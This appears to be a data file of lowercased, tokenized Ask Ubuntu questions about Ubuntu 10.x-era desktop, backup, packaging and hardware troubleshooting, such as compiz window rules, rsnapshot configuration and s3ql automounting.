20443	how can i pin osd-lyrics to the desktop ?	i have certain applications pinned to my desktop . such as rainlendar ( 1 ) , which offers this option in the settings window conky ( 2 ) , with `` own_window_type normal '' in my ~/.conkyrc rhythmbox 's desktop cover art plugin ( 3 ) , a python plugin sticked to the desktop . they all hide nicely below all other windows . i set compiz to not minimize them on `` show desktop '' command using `` window rules '' . i also use osd-lyrics to display music lyrics . it 's default behaviour is to stick always on top , which is irritating sometimes and , in my case , looks rather fugly . ( 4 ) see screenshot : now how can i tell compiz to pin the osd-lyrics bar to the desktop below all other windows and not minimize it ? i tried all sorts of window rules and exceptions , e.g . using `` class=osd-lyrics '' , `` title=osd-lyrics '' but the osd does n't seem to match any of these . any ideas ? running : ubuntu 10.10 maverick meerkat , compiz 0.8.6 , osd-lyrics 0.3 from
20449	compiz antialiasing with xserver-xorg-video-radeon ?	windows previews are ugly on my computer . is there any solution to make them smooth ? btw windows previews in metacity with compositing enabled ( /apps/metacity/general/compositing_manager ) are looking much better than in compiz . i am using the open source radeon driver , so i ca n't configure my videocard preferences via amd 's gui , and i 've tried all options like a texture filter , bicubic filter or mipmapping i found in ccsm with no result . how to make windows previews in compiz be as smooth as they are in metacity ? and sorry , my english sucks just like these windows thumbnails in compiz .
20450	disable root account in ubuntu ?	i was asked for root credentials to setup my printer in ubuntu . this seemed to be caused by a bug . and the suggested workaround is to create a root password . since it is default that no root password is used in ubuntu , i wonder how i could revert this changes . once i have set a password for root , is there a method to disable it again ?
20455	cron scheduling : is the hour argument in 24h format ?	in order to run cron in the night at 4 o'clock i need to write 4 * * * * ? and to run at 16.00 o'clock , it should be 16 * * * * ? thanks
20460	move installation to new disk	i currently have one hd with these partitions : /dev/sdb1 / /dev/sdb2 swap /dev/sdb3 /home i 'm thinking about buying a ssd for my / partition . now my question is : is it possible to move/convert my current configuration to the new one ( two disks , /home remains ) ? prefarably from within the running system ?
20461	would you recommend to install libcupsys2_1.3.9-17ubuntu3.9_all.deb ?	would you recommend to install libcupsys2_1.3.9-17ubuntu3.9_all.deb in ubuntu 10.10 ? for getting my printer to work with ubuntu 10.10 i 've read many threads about a suggested workaround.there it 's suggested to install libcupsys2_1.3.9-17ubuntu3.9_all.deb so that the canon driver should again do it 's work with ubuntu . but i ca n't figure out what this package exactly is and like to understand what i do before i install it . in some thread they call it a dummy package , in others it 's called a transitional package . however there should have been a reason why the ubuntu developers had deprecated libcupsys . so would you recommend it ?
20463	how can i download an entire website ?	i want to download the whole website ( with sub-sites ) , is there any tool for that ?
20472	win 2-7 plymouth bootsplash problem	i uninstalled the transformation pack , but the bootsplash did n't reverted back to default ubuntu . t_t i tried to do the manual terminal changing of it , and it worked halfway . the bootscreen when booting is still the ( although awesome , i need to change ) windows logo . but when shutting down or restarting , it worked .
20473	diffrence between two dirs ?	i have two identical folders , but the are not identical ( for example java installation dir ) . one dir has one extra file and one file has been changed . is there any easy to use tool to check that or do i have to write complicated bash script for that ? p.s . i 'm looking for command-line tool , but if you know any gui tools please share the knowledge .
20483	hide .desktop files from shares in virtualbox	i share my desktop with virtualbox . it allows me to work on current files in a nice easy way . i have quite a few utility launchers on my desktop . it 's only a dozen or so at peak time but it makes navigating the list of real files a little harder when i 'm working from windows . i was wondering if there was a way of excluding the files from the share . either at virtualbox ( i 've no idea where it keeps its samba configuration -- or if it actually uses samba at all for that matter ) or in windows .
20484	how can i get html code from the web with vala ( gtk ) ?	how can i get a html code from some site ( e.g . www.google.com ) using vala ( gtk ) ?
20485	tool to search for packages whose installed version does not match any version from a repository ?	i just upgraded from lucid to maverick , and as expected , all my ppas were disabled . i have re-enabled most of the ones that i want , but i would like to get a list of all packages that i installed from ppas that i no longer have enabled . i feel that the best way to do this would be to search for all packages where the currently installed version of that package does not match any version from a currently-enabled repository . is there an easy way to search for such packages . command-line solutions welcome .
20486	how to configure ubuntu with standard tv ?	ubuntu 8 version nvidia card with driver 96.43.10-0ubuntu1 /etc/x11/xorg.conf section `` screen '' identifier `` television screen '' device `` television device '' monitor `` television '' defaultdepth 24 option `` tvoutformat '' `` component '' option `` tvstandard '' `` pal-b '' subsection `` display '' depth 24 modes `` 640x480 @ 40 '' endsubsection endsection section `` module '' load `` glx '' disable `` dri2 '' endsection section `` device '' identifier `` default device '' driver `` nvidia '' endsection television is sharp flatx standard tv , its specifications can be found at http : //www.amazon.com/sharp-x-flat-32f630-flat-screen-32/dp/b0000akvav there were other screen sections which i removed . the tv shows just distorted image with just particles of different colors . i tried different resolution but did not figure out . kindly help me how to setup tv with ubuntu . i am newbie to this and not aware of subtle technicalities . thanks indeed .
20489	how to install vendetta online ?	i 'm new to ubuntu and i have downloaded a game called vendetta online , and it seems to have a .sh extension . when i double click it , it opens a text editor saying : ca n't open the file . what is the problem here and how do i fix this ? is there a way to run a .sh in linux ? i use hp notebook computer with amd64x processor and ubuntu 10.10
20494	how do i completely get rid of gnome panel ?	i wish to use wingpanel and take out gnome panel all together . how would i do this ?
20496	gnome mplayer divx plugin does not work	the firefox plugin for totem works for divx streaming videos , but the gnome mplayer one does not , for example for the videos on stagevu.com . what could be wrong here ?
20500	how to turn off trash ?	i do n't believe in trash bin and when i delete something i want it to be gone forever , how to turn off the trash ? p.s . when i delete files from the console do they also go to trash ?
20502	install applications on livecd/usb	i 'm running ubuntu off a usb drive and i ca n't install it to the hard-drive yet . is there a way for me to install more applications on the usb drive so that everytime i boot i can use them without re-installing ?
20507	concatenating several .mp3 files into one .mp3	as it was suggested here i am using cat command to concatenate several .mp3 files into one .mp3 file . imagine , i have following .mp3 files in the current folder : 001001.mp3 001002.mp3 001003.mp3 001004.mp3 001005.mp3 or , like this : 096001.mp3 096002.mp3 096003.mp3 096004.mp3 i need to concatenate these .mp3 files in there ascending sequence , i.e . 001001.mp3+001002.mp3+001003.mp3+etc . in order to join these .mp3 files into one i am executing following command in the current folder : cat *.mp3 > final.mp3 i tested the final .mp3 file and it is what i am expected , but i need to be sure that above command picks files in there ascending sequence . can i be sure that above command always concatenates files in the ascending sequence ? thank you sir !
20508	script for an incremental file system backup	i 'd like to run the following incomplete script weekly in as a cron job to backup my home directory to an external drive mounted as /mnt/backups # ! /bin/bash # timedate= $ ( date + % b- % d- % y- % k : % m ) lastbackup=pathtodirwithlastbackup rsync -avr -- numeric-ids -- link-dest= $ lastbackup /home/myfiles /mnt/backups/myfiles $ timedate my first question is how do i correctly set lastbackup to the the the directory in /backs most recently created ? secondly , i 'm under the impression that using -- link-desk will mean that files in previous backups will not will not copied in later backups if they still exist but will rather symbolically link back to the originally copied files ? however , i do n't want to retain old files forever . what would be the best way to remove all the backups before a certain date without losing files that may think linked in those backups by currents backups ? basically i 'm looking to merge all the files before a certain date to a certain date if that makes more sense than the way i initially framed the question : ) . can -- link-dest create hard links , and if so , just deleting previous directories would n't actually remove linked file ? finally i 'd like to add a line to my script that compresses each newly created backup folder ( /mnt/backups/myfiles $ timedate ) . based on reading this question , i was wondering if i could just use this line gzip -- rsyncable /backups/myfiles $ timedate after i run rsync so that sequential rsync -- link-dest executions would find already copied and compressed files ? i know that 's a lot , so many thanks in advance for your help ! !
20516	is it okay to upload a binary 'source ' archive to launchpad for building ?	i have a package that is extremely complicated and uses libraries not included in any of the default repos . can i upload a 'source ' archive that contains the source and a pre-compiled binary ? the build script would simply copy the binary to the package being built . is this acceptable or will i run into trouble ? note : this is the project page .
20519	libreoffice takes 30 seconds to start . oo started almost immediately	installed libreoffice , no problems but when i click on librewriter it takes 30 seconds before it 's ready to go . i played with memory in options , no improvement . i unchecked java , no improvement .
20521	security considerations for a default install ?	so with an old burned install cd of feisty fawn i went through the process of completely formatting the windows os and installing ubuntu on an old xp laptop . i then went through the online upgrade to 10.4 lts , only installing the gnome desktop environment package in the process . my ( admittedly very open ) question is that in this state and online , what security considerations do i have to immediately make for the default install ? i understand that a lot of this swings on my intended use of the server , but just sitting there online what risks is it exposed to ( this obviously goes far beyond the realm of linux , but i am not sure how these risks are accommodated in the default install ) . for example , i believe there is a firewall installed with ubuntu but by default it allows all traffic . any other guidelines would be much appreciated . thanks
20530	how can i find the location ( on the desktop ) of a window on the command line ?	i 'm trying to write a little script to help manage my windows via keyboard shortcuts . in order to do what i want , i need to be able to find the current location and size of the `` active '' ( focused ) window . by location , i mean the x , y coordinates of the window on the desktop , and by size i mean the height and width of the window . is there a command line utility that can fetch this information ?
20531	how to determine the version and origin of proprietary drivers installed by additional drivers ?	how can i tell which version and from which repository the additional drivers tool is trying to install the fglrx graphics driver ? it says that i have a different version of the driver in use . i installed the driver from maverick/restricted and apt-cache tells me it 's from a regular ubuntu mirror . the installed version is the same as the candidate version . can i get additional drivers to tell me what it would install if i activated the driver through it ? is it possible additional drivers just assumes it 's a different version since it was installed by a different process ?
20535	why i ca n't access partition on which i have installed it ?	i have installed wubi on one of my ntfs partions , i chose this one , because it had the most free space , but for some reason wubi does not mount it automatically , can i mount it manually ?
20540	bootable usb / installation requirements	originally asked on one hundred paper cuts answers thread on the official site : http : //www.ubuntu.com/netbook/get-ubuntu/download the instructions for creating a bootable usb key for installing ubuntu netbook remix include a line saying : '' insert a usb stick with at least 2gb of free space '' i recently installed unr on a netbook -- in fact , the one i 'm using right now -- and i went ahead despite only having a 1gb usb key on hand . everything went smoothly and installed 100 % correctly . if i had waited to go out and buy a 2gb usb key i would have spent that money unnecessarily and would n't have been able to use the computer in the meantime . i was wondering if there 's a specific rationale for requiring a 2gb usb key , or if the instructions could be changed to indicate that it can be done with only 1gb . thanks !
20543	how do i get a boxee remote working ?	i purchased a boxee remote , which is an rf remote so i do n't need to mess with lirc or anything like that . how do i get it working in ubuntu for use as a media center remote ?
20554	chroot into a 32-bit version of ubuntu from a 64-bit host	xilinx webpack 10.1 requires 32-bit linux . only this old version is compatible with their boards . how to make 32-bit applications work on a 64-bit operating system lists : installation of 32-bit compatibility libraries ( ia32-libs or multiarch support ) i already installed ia32-libs , and it 's still not working a 32-bit chroot full virtualization through kvm or virtualbox no , i do n't want to be working from a vm all of next semester , that would be painful and i 'd rather just reinstall my whole computer to a 32 bit os ; which i do n't want to do . another option in a pinch is getlibs getlibs it did n't sound like it was the best option based on what i 've seen . so i went off to do # 2 , and set up a chroot for 32-bit ubuntu lucid ( 10.10 ) . which is to say i wrote : [ hardy-i386 ] description=ubuntu 8.04 hardy for i386 directory=/srv/chroot/hardy-i386 personality=linux32 root-users=leif type=directory users=leif to /etc/schroot/chroot.d/hardy-i386 i then ran : $ sudo mkdir -p /srv/chroot/hardy_i386 $ sudo debootstrap -- variant=buildd -- arch i386 hardy /srv/chroot/hardy_i386 http : //archive.ubuntu.com/ubuntu/ then i ran : $ schroot -l and it showed the proper chroot , but then when i run : $ schroot -c hardy-i386 -u root i get the following error : e : 10mount : error : directory '/srv/chroot/hardy-i386 ' does not exist e : 10mount : warning : mount location /var/lib/schroot/mount/hardy-i386-80359697-2164-4b10-a05a-89b0f497c4f1 no longer exists ; skipping unmount e : hardy-i386-80359697-2164-4b10-a05a-89b0f497c4f1 : chroot setup failed : stage=setup-start /srv/chroot/hardy-i386 most certainly exists . i 've also tried it replacing all references with hardy to lucid , to no avail . i did set up the chrome os environment : http : //www.chromium.org/chromium-os/developer-guide and it had me use something with chmod . so , can anyone figure out what the problem is ?
20560	recommended website for ubuntu users ?	hello ! ! anyone know , what 's recommended website for ubuntu user ? such as tutorial , tips , trick , etc : d thanks ...
20568	trying to overwrite '* ' , which is also in package faenza-icon-theme 0.8	i have docky installed on ubuntu 10.10 64bit and noticed after a recent upgrade my 'helpers ' are no longer available . after some research i found that dockmanager is no longer installed either . i am unable to install it via the software centre or via terminal using apt-get , the following error is returned ; mark @ sonata : ~ $ sudo apt-get install dockmanager reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : dockmanager 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0b/94.4kb of archives . after this operation , 430kb of additional disk space will be used . ( reading database ... 162015 files and directories currently installed . ) unpacking dockmanager ( from ... /dockmanager_0.1.0~bzr83-0ubuntu1~10.10~dockers1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/dockmanager_0.1.0~bzr83-0ubuntu1~10.10~dockers1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/dockmanager/data/skype_invisible.svg ' , which is also in package faenza-icon-theme 0.8 dpkg-deb : subprocess paste killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/dockmanager_0.1.0~bzr83-0ubuntu1~10.10~dockers1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) mark @ sonata : ~ $ can anyone advise on how to fix this ?
20571	why is more than 3gb of ram not recognised when using amd64 ?	why does ubuntu 10.10 amd64 not addresses more of 3gb ram ? please if somebody knows about that , tell me the solution . my machine is a toshiba p205-s6287 intel centrino duo 64 bits procesor and 4gb ram 667mhz .
20572	how to automount hard disks without the need for password at login ?	i want my kubuntu to auto mount my hard disks at login without the need for password . i tried it through system settings - > removable media and checked `` enable automount removable media '' . but at the moment i log in kdesudo asks for password for all the hard drive at once . i want it without any password . how can i do that ?
20574	how to create a s3ql file system and mount it automatically on boot ?	i 've been experimenting with s3ql on ubuntu 10.04 , using it to mount amazon s3 buckets . however , i 'd really like it to mount them automatically . does anyone know how to do that ? solution : thanks to help from nikratio of s3ql i 'm finally able to mount s3 buckets automatically when the system boots . you 'll definitely want to look at the manual , but here 's the basics of how to do it ! the first step is to create an authinfo file . this file should be placed in a .s3ql directory within the home directory of the user who will be using it . the authinfo file contains login info allowing s3ql to mount buckets without prompting . below is an example of what your authinfo file should look like . the first line contains your amazon security credentials . the second contains the location and password for your bucket . you can add multiple bucket-lines to this file if needed , but i 'm only using one in this example . at this point , the bucket password can be anything . backend s3 machine any login yourawsaccesskeyid password yourawssecretaccesskey storage-url s3 : //mybucket password encryptionpasswordofyourchoosing the encryption_password_of_your_choosing is used by s3ql to encrypt/decrypt all file writes/reads from s3 . the bucket name has to be unique across all of aws : no two users can have the same bucket name , so its a good idea to log into amazon web services and try different names until you find one that 's available . one good naming scheme is to use the name of the domain+server you 'll be accessing the bucket from ( i.e . `` staging.example.com '' or `` east.coast.01.example.com '' , or whatever is appropriate ) . to create the file system , use the command : mkfs.s3ql s3 : //mybucket it will prompt you for your encryption password . this should be the same as the bucket password in the authinfo file . now that your file system is created , you can mount it using the command : mount.s3ql s3 : //mybucket /mnt/s3/bucket of course , your bucket name and mount point will vary . now , if we want to mount this bucket automatically on boot , we need to add an upstart script to /etc/init . fortunately , s3ql comes packaged with one , s3ql.conf . i added `` -- allow-other '' to the mount.s3ql command to allow users other than root to access the mounted bucket . # # this file can be placed in /etc/init . it defines an upstart job that # takes care of mounting and unmounting an s3ql file system . # description `` s3ql backup file system '' author `` nikolaus rath < nikolaus @ rath.org > '' start on ( filesystem and net-device-up iface=eth0 ) stop on runlevel [ 016 ] env bucket= '' s3 : //mybucket '' env mountpoint= '' /mnt/s3/bucket '' expect stop script # redirect stdout and stderr into the system log dir= $ ( mktemp -d ) mkfifo `` $ dir/log_fifo '' logger -t s3ql -p local0.info < `` $ dir/log_fifo '' & exec > `` $ dir/log_fifo '' exec 2 > & 1 rm -rf `` $ dir '' # check and mount file system fsck.s3ql -- batch `` $ bucket '' exec mount.s3ql -- upstart -- allow-other `` $ bucket '' `` $ mountpoint '' end script pre-stop script umount.s3ql `` $ mountpoint '' end script after adding this script , in theory you should be able to reboot and have your bucket automatically mounted , but this is were i ran into trouble . mine was n't being mounted . my problem was caused by the fact that upstart was running the script as root , but i 'd created the file system as another user . once i copied the .s3ql directory from the home directory of the user i 'd been logged-in as to /root , the problem was solved . i hope this helps someone else out there . although i have n't been using my mounted s3 bucket for long , i 'm impressed with how my initial tests have gone . also , this answer was written about a week after the solution was found . i think i 've covered everything , but if you find i 've missed a step , let me know and i 'll add it . you 'll also want to read the manual , its really worth reading if you intend to use s3ql .
20576	will ubuntu work out on my mother 's computer ?	my mother had an old compaq desktop computer running windows 98 , which she used for occasional web browsing and playing cards . recently , a relative brought up a newer computer ; it ran windows xp . unfortunately , the hard drive failed soon afterward , forcing me to reinstall the operating system . not having the original windows disc or product key led me to consider ubuntu linux . will it work for mom ? is the hardware compatible ? ( check the history of this question for the full specifications . ) would ubuntu/xubuntu suffice , or would i be better off buying a new copy of windows ? is her card game ( hoyle card games 3 ) likely to run on wine ? i believe the minimum system requirement is windows 95 . failing wine compatibility , is running windows 98 on virtualbox an option on such an old computer ? are there any equally good card games for linux ? she plays mainly bridge , poker , and solitaire . is there any `` large fonts '' option for those with poor vision ? is it possible to use a serial mouse ?
20578	redirect the output using `sudo`	i have a small question regarding using sudo with output redirect > . to enable ip forwrding , someone can use the command : echo 1 > /proc/sys/net/ipv4/ip_forward executing this command will give permission denied as it requires root privileges . however , executing the same command with sudo gives also permission denied error ! it seems that output redirect > does not inherit the permissions of the preceding command echo . is this right ? as a workaround i do : echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward is this the best way to do it ? am i missing something ? please , note that this is an example and it applies to all commands that use output redirect .
20581	how to configure and ( tv ) video recording and pausing ?	set for television viewing tvtime , set up the remote , everything works fine . but i would like to set up an opportunity to put on pause live tv and that you could record video , is there a function in tvtime or may be it needs to install another program ?
20585	how to lock xscreensaver on suspend	hy ! i replaced gnome-screensaver with xscreensaver , it works great so far , but i ca n't get it to lock my session when i suspend my laptop . any ideas how to do that ? ubuntu 10.10 dell vostro 1310 thanks !
20588	should i comment out these lines in the default rsnapshot configuration ?	i 'm setting up the rsnapshot for backups . i 've seen in the configuration file , the following backup lines are not commented by default . should i leave them uncommented or not ? i 'm not interested in backing up my system , just specific folders . backup /home/ localhost/ backup /etc/ localhost/ backup /usr/local/ localhost/ thanks
20590	set default browser to open browser	i am switching constantly between browsers ( three different at the moment ) . so i was also switching default browsers to open my mail / new links etc ... i also saw that with the command sudo update-alternatives -- config x-www-browser the browsers have different priorities . so i had the idea that it could be possible that the default browser could be the browser/s that is/are actually open and running ! and if two are running , the one with higher priority is chosen . unluckily i did not find anything.. is this possible ? would be really great ! cheers dmeu
20591	after turning off the modem must juggle	i have a ubuntu 10.10 , hooked 3g internet with no problems . only one problem after disconnect from the internet then no longer connects ... be able to pull out of the usb , then stick and then konektitsya normal . is there any way to do something so that it was not necessary every time distorting the modem ?
20598	how to upgrade ubuntu using the live cd ?	i installed ubuntu 9.04 on my desktop , an year ago . can i upgrade from ubuntu 9.04 to ubuntu 9.10 using the ubuntu 9.10 live cd ?
20599	desktop icons wo n't display in all virtual desktops	the icons i set in kubuntu are not displaying correctly , have been trying to find the configuration but the weirdest thing is that they display in desktop 2 but not in desktop 1 which is the main one , i want to display them in all desktops .
20600	`` backup intervals '' in rsnapshot.conf ?	a simple question about rsnapshot . in order to perform daily backups i 'm going to add lines to cron in my ubuntu . then , why do i have also these lines in the rsnapshot.conf ? # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # backup intervals # # must be unique and in ascending order # # i.e . hourly , daily , weekly , etc . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # interval hourly 6 interval daily 7 interval weekly 4 # interval monthly 3 if i use cron , should i disable them ? thanks ps . i 've just realized that in the crontab i still have `` hourly '' and `` daily '' . should i then uncomment only the one i use in the crontab ? and what 's the point to specify hourly if it is already specified in cron ? i 'm a bit confused . # crontab -e 0 */4 * * * /usr/local/bin/rsnapshot hourly 30 23 * * * /usr/local/bin/rsnapshot daily
20603	what does snapshot_root do ?	i want to use rsnapshot for remote backups of my websites . it is not clear this line in rsnapshot.conf : snapshot_root /.snapshots/ in the documentation , it says snapshots are stored in this directory , but i actually want them to be stored on a remote server and this is specified later with the line backup local_folder remote_server so what 's snapshot_root then ?
20607	moving to new machine ... also upgrade to 64bit . what steps ?	i am about to move to a new lenovo x201 from current x61 . current setup has separate \home , separate swap file , also separate \data partition . am currently running 10.04 32 bit . am considering running 64 bit on new machine because i will now have 8 gb of ram . and would like to also move to 10.10 . ideally i would like preserve as much of my current setup as possible ... new machine has win7 on it , but will blow that away , as i 've made a clonezilla copy of it , and will use virtualbox for when i need windows . can someone suggest a good step by step for me ? i 'm networked to a nas and also have plenty of external usb storage in case i need intermediary steps . so do i set up new machine first with 64bit 10.10 , with partition scheme i want ? then rsnyc over \home from old machine ( over write target home ) ? do i need to upgrade the x61 first to 10.10 ?
20612	vnc client not working -- not able to see the changes happening on the other side	here is the problem : i have two computers connected in the same lan . i am trying to access one computer from another using remote desktop viewer , i am able to see the remote desktop . but when i click on any thing or perform any action , i dont see the result but the action is performed on the remote desktop..but it is not refreshed on the remote desktop screen.. for ex : 1 ) opened remote desktop viewer 2 ) connected to the other computer which has yahoo home page opened 3 ) clicked on the close button of the web page 4 ) action is performed on the other computer ( yahoo page is closed ) . 5 ) on remote desktop screen i still see the yahoo home page 6 ) whatever action i perform on remote desktop screen i see the same screen ( in this case yahoo home page ) bottom line : whatever screen i see on the start up of remote desktop viewer that is not getting refreshed . so the thing is though i am able to perform actions on remote desktop , the screen is not refreshing.. how do i solve this ? i hope i made my point clear.. note : i am connecting to ubuntu 9.04 machine from ubuntu 10.04lts.. i am really not sure if that makes any difference .
20613	renoise and dssi and jack	this may be a little complicated , but , is jack a necessity ? i mean , i use renoise , and , since i dont have the need for low latencies , do i really need to use it ? my basic setup ( or workflow ) is that i use csound to render stuff to wav , then import it as a sample in renoise . that goes with field recordings , my own samples , etc . so , i dont need ultra low latencies , and i dont need to patch `` cords '' , but i want to use dssi plugins , and dssi-vst . what would be something of a minimum requirements of apps that should work . can renoise load dssi-vst plugins by itself or do i need to use jack to patch thru or something third , i tried to read lot of articles but i got lost in the different setups ...
20614	how can i specify a dependency between 2 versions of a package ?	in a debian/control file , how do i specify a dependency on a package between 2 versions of that package ? for example : python 2.5 or higher but lower than python 2.7 . depends : python ( $ version_string ) what would $ version_string be ?
20616	why does my ubuntuone sync only upload folders and zero content ?	i have been running ubuntuone sync on a new pc to a new ubuntuone account for over 14 hours . my ubuntuone account capacity stills show 0 % used and lists only folder names . all the while , my ubuntuone preferences indicate that sync is running . any ideas ? ? ?
20620	mouse and keyboard slow to recognize with kvm switch	i recently started using a kvm switch , so that i can share my usb mouse and keyboard between my linux and windows notebooks , when working at my desk . my windows machine handles the switch seamlessly , whereas my ubuntu system takes 5-10 seconds to re-recognize the mouse and keyboard . is there some way i can speed this up ?
20621	permissions issues with mounting remote server into a specific folder	i 'm doing the following to mount a remote server to a specific path on my server : sshfs user @ remoteserver.com : /backup/folder/ /home/myuser/server-backups/ however when i mount the server the folder permissions change ( they become 700 ) , and when i test my rsnapshot.conf file i get the following error : snapshot_root /home/myuser/server-backups/ - snapshot_root exists \ but is not readable what am i doing wrong ? should i mount the remote server with another user ?
20622	how do you erase the ghost of a section of the hd ?	right , no kidding now ... a mate last night asked me if it is possible to erase the ghost of a section of his hard drive ( set the unused section of the hard drive to '0 ' ) . so is it possible ?
20623	how to close multiple nautilus folders that are opening automatically after login ?	every time after i login into ubuntu 5 folders from the same path ( /usr/share/applications ) are opening automatically i searched in nautilus help and i couldnât find anything related to my issue . how to close multiple nautilus folders that are opening automatically after login ?
20624	gparted not working in live cd ( usb )	using ubuntu 10.10 live usb . when atempting to open gparted ( sudo gparted in a terminal ) , its window gets stuck a few seconds and disappears ( i noticed that it closes when it 's searching for /dev/sda/ partitions ) . after a while a window appears telling gparted closed unexpectedly and asking to restart it . choosing this option wo n't do any effect . typing sudo fdisk -l in a terminal does show a list of the drives and partitons correctly . any ideas ? thanks
20628	ca n't boot , video drivers or x-server problem ?	i was uninstalling some programs that i installed to try and get my ipod touch working with ubuntu ( i gave up on that ) when ubuntu just crashed . now after i choose ubuntu in grub , it gives me a screen that says `` ubuntu is running in low-graphics mode : your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself '' it was working just fine before i started to uninstall those programs . i think that i might have uninstalled something necessary to the system . if i click ok on the screen , it gives me options to reconfigure , troubleshoot , exit to console , or restart x . but no matter what i choose i still ca n't boot into ubuntu - i get stuck looking at the splash screen which stalls forever . i was receiving support from one of my mate 's and he was doing something with the livecd , and now the message does n't pop up any more , i just get stuck at a never ending splash screen . any help would be appreciated , thanks !
20630	does upgrading alter partitions ?	i was wondering if it 's safe to upgrade maverick meerkat to natty ( i believe i 'm fully aware of the bugginess of natty at the moment ) . the only thing that 's of concern is altering of other partitions during the install . will it wipe any partitions out ?
20632	files do n't sync with u1	i am running 10.10 ( all current updates have been installed ) and i'm unable to sync any files to u1 . u1 shows my computer as being added to my account and i bought enough space to hold all the files i want backed up , but for some reason it still does n't sync . i have marked the files to be synced and even checked the devices tab in the u1 preferences ; it shows my computer as being part of my account but the connect button is inoperable and restart does n't produce any effect when clicked . when using u1sdtool i sometimes get an ugly dbus error , and other times get state : ready . i have tried the line commands posted by bisi , they seem to be the same commands as those given in a similar question . i have also ran u1sdtool -- status check and heres what came up state : ready connection : not user with network description : ready to connect is_connected : false is_error : false is_online : false queues : working_on_both i 'm not very techno savvy so step by step and/or lay mens terms are greatly appreciated , thank you
20637	rails version not shown post installation	i had installed rubygems 1.8 and further on i had installed the rails 2.0.2 gem . when i tried to view the rails version installed through the command rails -v it did n't work.. i am unable to figure out why i am getting an `` invalid option '' on executing the command rails -v ( please refer the below for the same ) . mohnish @ mohnish-laptop : ~/downloads $ ruby -v ruby 1.8.7 ( 2010-01-10 patchlevel 249 ) [ i486-linux ] mohnish @ mohnish-laptop : ~/downloads $ gem list *** local gems *** actionmailer ( 2.0.2 ) actionpack ( 2.0.2 ) activerecord ( 2.0.2 ) activeresource ( 2.0.2 ) activesupport ( 2.0.2 ) rails ( 2.0.2 ) rake ( 0.8.7 ) mohnish @ mohnish-laptop : ~/downloads $ rails -v getopt : invalid option -- 'v' terminating ... mohnish @ mohnish-laptop : ~/downloads $ could you please help me out on this regard.. please note i am currently not making use of the ruby version manager ( rvm ) . please let me know if i could get a solution once i install the rvm . thanks for your help..
20644	problems creating a debdiff	i 'm following this guide to create a debdiff for a package i 'm patching . everything goes fine until step number 8 and i attempt to create the debdiff after committing the changes . the package in question is zim , pulled form launchpad using bzr branch lp : zim and according to this guide i should execute the following command to create the debdiff : debdiff zim_0.49.dsc zim_0.49ubuntu1.dsc > zim_0.49ubuntu1.debdiff however , when i actually try to execute this command , i get the following error : debdiff : fatal error at line 314 : ca n't read file : zim_0.49.dsc upon inspection of the directory in which the files created from debuild -s ( step 6 ) are deposited , i find zim_0.49ubuntu1_source.changes zim_0.49ubuntu1.dsc zim_0.49ubuntu1.tar.gz zim_0.49ubuntu1_source.build but no sign of zim_0.49.dsc . i could probably create one by debuilding the package as soon as i check out the code , before starting work , but that would add an extraneous entry in the changelog . is there a step missing from the guide that creates zim_0.49.dsc or is the file itself missing from the source ?
20646	how to create a diff of a file between it 's current and the latest tagged version in bzr ?	i have a file that is tracked using bzr , and i 'd like to script the creation of a diff between it 's current ( current as in current , not latest commited ) , and latest commited version that is tagged . does anyone know how to accomplish this ? not much of a bzr scripting or a python expert .
20649	is there a command-line utility app which can find a specific block of lines in a text file , and replace it ?	update ( see end of question ) the text `` search and replace '' utility programs i 've seen , seem to only search on a line-by-line basis ... is there a command-line tool which can locate one block of lines ( in a text file ) , and replace it with another block of lines. ? for example : does the test file file contain this exact group of lines : 'twas brillig , and the slithy toves did gyre and gimble in the wabe : all mimsy were the borogoves , and the mome raths outgrabe . 'beware the jabberwock , my son ! the jaws that bite , the claws that catch ! beware the jubjub bird , and shun the frumious bandersnatch ! ' i want this , so that i can replace multiple lines of text in a file and know i 'm not overwriting the wrong lines . i would never replace `` the jabberwocky '' ( lewis carroll ) , but it makes a novel example : ) update : .. ( sub-update ) my following comment about reasons when not use sed are only in the context of ; do n't push any tool too far beyond its design intent ( i use sed quite often , and consider it to be invaluable . ) i just now found an interesting web page about sed and when not to use it . so , because of all the sed answers , i '' ll post the link.. it is part of the sed faq on sourceforge also , i 'm pretty sure there is some way diff can do the job of locating the block of text ( once it 's located , the replacement is quite straight foward ; using head and tail ) ... 'diff ' dumps all the necessary data , but i have n't yet worked out how to filter it , ... ( i 'm still working on it )
20650	cycle around the `` end '' of workspaces in gnome ?	i have a typical gnome setup , in which i can move/switch between workspaces , by hitting ctrl+alt+‹or›arrow . but when i 'm in workspace 1 , hitting ctrl+alt+‹ has no effect , and similarly for my maximum workspace ( typically 4 ) . is there any way i can have this cycle around , so that hitting ctrl+alt+› in workspace 4 will bring me back around to 1 ?
20652	how do i exclude windows during back up ?	i am backing up ubuntu and went to check out how it was going and noticed it was backing up my windows too . how do i exclude windows during backup ? it says /host , so would i just do -- exclude=/host ? edit : i 'm backing up everything in terminal . i do n't have a /media/windows folder . /host seems to contain all my windows documents and everything .
20663	mythtv gives an error when selecting `` watch tv ''	i 've set up mythtv for watching tv . i 've configured the back end . i have a tv tuner , and a table of frequencies . but when you start the front end and make the transition to the item `` watch tv '' , it shows a window with the message error : mythtv is using all inputs , but there are no active recordings what could be the problem ?
